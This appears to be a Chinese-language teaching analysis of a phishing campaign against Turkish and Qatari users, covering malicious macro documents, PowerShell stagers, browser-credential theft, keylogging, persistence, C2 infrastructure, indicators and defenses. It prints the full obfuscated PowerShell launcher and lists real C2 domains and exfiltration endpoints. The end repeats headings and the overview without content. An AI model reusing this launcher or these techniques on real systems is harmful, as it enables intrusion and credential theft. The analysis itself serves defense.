新型网络钓鱼活动事件分析教学文档<\/h1>

事件概述<\/h2>
这是一起针对土耳其和卡塔尔用户的针对性网络钓鱼攻击活动，攻击者使用恶意Word文档作为初始攻击载体，通过宏代码执行PowerShell脚本，窃取浏览器敏感信息并建立持久化控制。<\/p>

攻击流程分析<\/h2>

初始攻击载体<\/h3>

使用阿拉伯语命名的恶意Word文档：

دعوة.doc<\/code> (邀请.doc)<\/li>
إستمارة.doc<\/code> (表格.doc)<\/li> <\/ul> <\/li>
文档内容伪装成"Al Quds议员协会"会议邀请，主题为"耶路撒冷是巴勒斯坦永恒的首都"<\/li>

诱使用户启用内容以执行恶意宏代码<\/li>
<\/ul>
技术执行流程<\/h3>

Word文档启用宏后执行恶意代码<\/li>
生成cmd.exe进程，执行混淆的PowerShell命令<\/li>
PowerShell从C2服务器下载并执行恶意脚本(cscript.ps1<\/code>)<\/li>
<\/ol>
典型命令行示例<\/strong>:<\/p>
"C:\Windows\System32\cmd.exe" \/c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9\/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"
<\/code><\/pre>
恶意脚本功能<\/h3>


信息窃取<\/strong>:<\/p>

从Chrome、Firefox、Opera浏览器窃取:

Cookies<\/li>
会话信息<\/li>
登录凭证<\/li>
<\/ul>
<\/li>
键盘记录功能(基于GitHub开源代码修改)<\/li>
<\/ul>
<\/li>

持久化机制<\/strong>:<\/p>

创建计划任务<\/li>
使用GlobalMutex确保单实例运行:

Global\rYF1pgeADA<\/code><\/li>
Global\wfCQnIo2G7<\/code><\/li>
<\/ul>
<\/li>
使用squiblydoo技术(通过scriptlet文件执行)<\/li>
<\/ul>
<\/li>

C2通信<\/strong>:<\/p>

统一URL路径结构: \/api\/{endpoint}<\/code><\/li>
主要端点:

\/api\/cscript<\/code> - 主脚本<\/li>
\/api\/pscript<\/code> - 持久化脚本<\/li>
\/api\/logger\/submit<\/code> - 键盘记录数据提交<\/li>
\/api\/{browser}\/submit<\/code> - 浏览器数据提交<\/li>
\/assest\/sqlite<\/code> - SQLite DLL下载<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ol>
技术细节分析<\/h2>
混淆与逃避技术<\/h3>


命令行混淆<\/strong>:<\/p>

大小写随机混合(如pOwErSheLl<\/code>)<\/li>
使用EcHo<\/code>命令拼接执行代码<\/li>
参数分散传递<\/li>
<\/ul>
<\/li>

执行逃避<\/strong>:<\/p>

-NoProfile<\/code> - 不加载配置文件<\/li>
-ExecutionPolicy Bypass<\/code> - 绕过执行策略<\/li>
-WindowStyle Hidden<\/code> - 隐藏窗口<\/li>
-NonInteractive<\/code> - 非交互模式<\/li>
<\/ul>
<\/li>

代码传递<\/strong>:<\/p>

使用DEFLATE压缩和Base64编码<\/li>
内存中解压执行，减少磁盘痕迹<\/li>
<\/ul>
<\/li>
<\/ol>
基础设施分析<\/h3>

C2服务器<\/strong>:

microsoftdata.linkpc.net<\/code><\/li>
4host.publicvm.com<\/code><\/li>
<\/ul>
<\/li>
DNS服务<\/strong>:

使用DNSExit提供的动态DNS服务<\/li>
<\/ul>
<\/li>
URL模式<\/strong>:

固定使用\/api\/<\/code>前缀路径<\/li>
<\/ul>
<\/li>
<\/ul>
检测与防御建议<\/h2>
检测指标(IOCs)<\/h3>


文件哈希<\/strong>:<\/p>

1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324<\/code> (دعوة.doc)<\/li>
bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770<\/code> (إستمارة.doc)<\/li>
7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c<\/code> (cscript.ps1)<\/li>
<\/ul>
<\/li>

网络指标<\/strong>:<\/p>

hxxp:\/\/microsoftdata[.]linkpc[.]net<\/code><\/li>
hxxp:\/\/4host[.]publicvm[.]com<\/code><\/li>
<\/ul>
<\/li>

行为指标<\/strong>:<\/p>

Winword.exe生成可疑cmd.exe进程<\/li>
cmd.exe调用PowerShell下载执行远程代码<\/li>
创建特定命名的全局互斥量<\/li>
异常的计划任务创建<\/li>
<\/ul>
<\/li>
<\/ol>
防御措施<\/h3>


技术控制<\/strong>:<\/p>

禁用Office宏执行或限制为仅签名宏<\/li>
监控和限制PowerShell的异常使用<\/li>
实施应用白名单策略<\/li>
监控可疑的父子进程关系(如winword->cmd->powershell)<\/li>
<\/ul>
<\/li>

安全意识<\/strong>:<\/p>

培训用户识别可疑邮件和文档<\/li>
警告用户不要轻易启用文档内容<\/li>
对涉及敏感主题的文档保持警惕<\/li>
<\/ul>
<\/li>

取证分析<\/strong>:<\/p>

检查计划任务中可疑条目<\/li>
搜索系统中特定命名的互斥量<\/li>
分析PowerShell日志和命令行历史<\/li>
<\/ul>
<\/li>
<\/ol>
关联分析<\/h2>

与2018年8月针对卡塔尔的攻击活动相似:

相同攻击模式<\/li>
代码结构相似<\/li>
使用相同动态DNS服务<\/li>
<\/ul>
<\/li>
可能出于政治动机而非经济利益驱动<\/li>
<\/ul>
总结<\/h2>
该攻击活动展示了高级持续性威胁(APT)的典型特征:<\/p>

针对性钓鱼诱饵<\/li>
使用合法工具链(LOLBins)<\/li>
多阶段载荷投放<\/li>
持久化机制<\/li>
信息收集与渗出<\/li>
基础设施冗余<\/li>
<\/ol>
防御此类攻击需要多层防护策略，结合技术控制、行为监控和用户教育。<\/p>

新型网络钓鱼活动事件分析教学文档<\/h1>

事件概述<\/h2> 这是一起针对土耳其和卡塔尔用户的针对性网络钓鱼攻击活动，攻击者使用恶意Word文档作为初始攻击载体，通过宏代码执行PowerShell脚本，窃取浏览器敏感信息并建立持久化控制。<\/p>

攻击流程分析<\/h2>

技术细节分析<\/h2>

检测与防御建议<\/h2>

事件概述<\/h2>
这是一起针对土耳其和卡塔尔用户的针对性网络钓鱼攻击活动，攻击者使用恶意Word文档作为初始攻击载体，通过宏代码执行PowerShell脚本，窃取浏览器敏感信息并建立持久化控制。<\/p>